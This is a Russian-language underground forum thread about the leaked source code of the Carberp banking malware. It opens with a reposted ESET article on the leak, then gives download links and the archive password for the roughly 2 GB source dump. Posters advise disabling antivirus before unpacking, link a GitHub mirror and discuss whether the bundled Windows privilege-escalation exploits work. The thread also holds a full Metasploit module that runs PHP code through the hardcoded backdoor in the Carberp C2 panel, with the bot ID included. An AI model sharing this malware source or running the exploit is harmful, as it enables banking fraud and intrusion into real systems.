Утечка исходников Carberp

[DarckSol]

Уже не является секретом тот факт, что полные исходные тексты известного банковского вредоносного ПО Carberp утекли в паблик. Около 5GB исходных текстов оказались в поле зрения фактически любого желающего. Архив включает в себя:

• Исходный текст буткита, km драйверов и всего что работает в km.
• Билдер дропперов.
• Плагины.
• Веб-инжекты.
• LPE эксплойты.
• Огромное количество другой полной и необходимой информации, чтобы начать свой собственный проект по разработке вредоносного кода.

Как и в случае с Zeus, история началась с того, что архив с текстами был выставлен на продажу на нескольких подпольных форумах. Ниже представлен пост с объявлением с одного из форумов. Первоначально информация о том, что исходные тексты Carberp были выставлены на продажу была опубликована Trusteer 18-го июня, т. е. около недели назад. При этом указывалось, что цена архива составляет $50,000. Но позже на одном из форумов появилась информация, что тексты продаются по очень низкой цене, всего лишь $5,000. Архив включает в себя тексты вредоносного кода и купленные сторонние наработки с 2008 г.

Нам удалось получить архив с исходными текстами Carberp и мы можем констатировать тот факт, что утечка исходных текстов Carberp является самой крупной вообще из тех, что были раньше среди вредоносных программ. При этом в этот показатель входит как количество возможностей самого вредоносного кода, которые описываются включенными текстами, их степенью детальности, а также деструктивности, которую могут нанести клоны, основанные на этих исходных текстах.

Один из модераторов kernelmode.info, EP_X0FF собрал статистику по семействам вредоносных программ, функционал которых описан утекшими текстами. Этот список действительно впечатляет(!): Ursnif, Rovnix, Alureon, Phdet, Zeus, Vundo, SpyEye. Все эти семейства вредоносных программ очень хорошо известны ресерчерам и получили большое распространение.

Поясним, что Carberp изначально не имел своей bootkit-составляющей до 2011 г., когда разработчиками был куплен фреймворк Rovnix (одно из первых семейств буткитов, которое использовало метод заражения VBR, что позволяло загружать свой драйвер на x64 платформах в обход ограничений ОС). Код Rovnix и история включения его исходных текстов в Carberp были детально описаны нашим коллегой Александром Матросовым здесь. Мы также составляли полный отчет об эволюции Carberp, в котором можно было отследить этапы развития вредоносного кода.

Многие издания и АВ-вендоры напишут или уже написали об инциденте, связанном с утечкой исходных текстов Carberp, так как это действительно громкий инцидент, который может повлечь за собой неприятные последствия. Имеется в виду факт появления клонов как самого банковского вредоносного ПО Carberp, буткит-платформы Rovnix, так и другого вредоносного кода, который может быть создан по оказавшимся в паблике исходным текстам вредоносного кода.


Источник: http://habrahabr.ru/company/eset/blog/184576/

 

[Wolfomeo]

Архив явно цыгане собирали.

 

[DarckSol]

Ага, выложу чуть позже, он весом 1,9 гига и чего там только нет.

 

[DarckSol]

Скачать|Download
Скачать|Download

^**************************************^

Passwd:Kj1#w2*LadiOQpw3oi029)K   Oa(28)uspeh

^**************************************^

ЗЫ: При распаковке архива, гасите антивирус, т.к в комплекте очень много разных сборок на которые ругаются 98% АВ.

 

[Wolfomeo]

Passwd: Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh

Возьми в тэг code, а то трёх пробелов не видно:

Kj1#w2*LadiOQpw3oi029)K   Oa(28)uspeh

 

[DarckSol]

Поправил

 

[Ar3s]

Уменьши картинку или сделай превью кликабельное. Шаблон разрывает.

 

[integra]

И копирайт с харба поставь, не все ссылки перенес ..

 

[el-]

линки по теме

тут нарыл и перевел ( на енг ) кучу текстов, интерес представляет непосредственно линки до текстовиков, дабы почитать их в оригинале и не копать в ручную всю эту кучу
http://malwageddon.blogspot.nl/2013/06/car...has-fallen.html

тут тоже разбор этого огромного архива, да и вообще полезно почитать что пишут эти ребята
http://www.kernelmode.info/forum/viewtopic...?p=19792#p19792

разбор антирапорт, с картиночками
http://www.adlice.com/carberp-anti_rapport...eer-protection/

и копия всех сорцев на гитхабе, что полезно дабы не держать этот архив у себя
https://github.com/hzeroo/Carberp

 

[demien]

на km как будто бы выделили (через поиск) все фразы где есть матерные слова
на гитхабе почему то не отображается ничего

з.ы. в любом случае настала очередь лика и спай ая до кучи

 

[integra]

там на самом деле много чего нет, и многое устарело

спай самый долго живучий, хорошо сделан видимо, правильно поставлен, поэтому и сорсы не утекают

 

[demien]

сорцы как я слышал у некоторых есть...

 

[salamandra]

Устарело не устарело,а то что там есть все равно заслуживает внимания.Только там солянка из разных грибов,пойди там разберись.Кому надо,тот найдет для себя
что то еще актуальное.По беглому взгляду понятно что собирался код из разных источников.Фриланс и так далее.Ну нах не буду заморачиваться.

 

[nairobi708]

а zeroaccess сорсы не утекали ?

 

[DrakonHaSh]

а у кого нить успешно сработали эксплоиты с
carberp.rar\krab\source - absource\pro\source builder plugins inj's modules etc\Сорцы и Модули\Win7 exp.7z
?
проверил на нескольких машинах [xp - 4 штуки, win2k3, win7] - не одного успеха.

 

[DarckSol]

Metasploit

Carberp Web Panel C2 Backdoor Remote PHP Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
      'Description'    => %q{
          This module exploits backdoors that can be sighted all over the leaked
        source code of the Carberp botnet C2 Web Panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module
          'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
          'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting
        ],
      'References'     =>
        [
          ['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Keys'        => ['php'],
          'Space'       => 10000,
          'DisableNops' => true
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['carberp', {}]
        ],
      'DisclosureDate' => 'Jun 28 2013',
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new('TARGETURI',[true, "The path to the backdoor, often just index.php", "/index.php"]),
        OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),
      ],self.class)
  end
 
  def check
    confirm_string = rand_text_alpha(8)
    cmd = "echo '#{confirm_string}';"
    shell = http_send_command(cmd)
    check_code = Exploit::CheckCode::Safe
 
    if shell and shell.body.include?(confirm_string)
      check_code = Exploit::CheckCode::Vulnerable
    end
 
    check_code
  end
 
  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'  => 'POST',
      'uri'    => uri,
      'vars_post'  =>
        {
          'id' => datastore['BOTID'],
          "data" => Rex::Text.encode_base64(cmd.unpack('H*'))
        }
    }
    res = send_request_cgi(request_parameters)
 
    res
  end
 
  def exploit
    http_send_command(payload.encoded)
  end
end

 

[el-]

http://www.adlice.com/carberp-bootkit-how-...n-is-effective/

 

[DarckSol]

http://www.adlice.com/carberp-bootkit-how-...n-is-effective/

Уважаемые пользователи!

Мы приносим свои извинения, но доступ к запрашиваемому ресурсу ограничен.

Возможные причины ограничения доступа:

Доступ ограничен по решению суда или по иным основаниям, установленным законодательством Российской Федерации.

Сетевой адрес, позволяющий идентифицировать сайт в сети «Интернет», включен в Единый Реестр доменных имен, указателей страниц сайтов сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространение которой в Российской Федерации запрещено.

Проверить наличие сетевого адреса в Едином реестре можно в разделе «Просмотр реестра» на сайте www.zapret-info.gov.ru.

Сетевой адрес, позволяющий идентифицировать сайт в сети «Интернет», включен в Реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространяемую с нарушением исключительных прав.

Проверить наличие сетевого адреса в Реестре можно в разделе «Просмотр реестра» на сайте nap.rkn.gov.ru.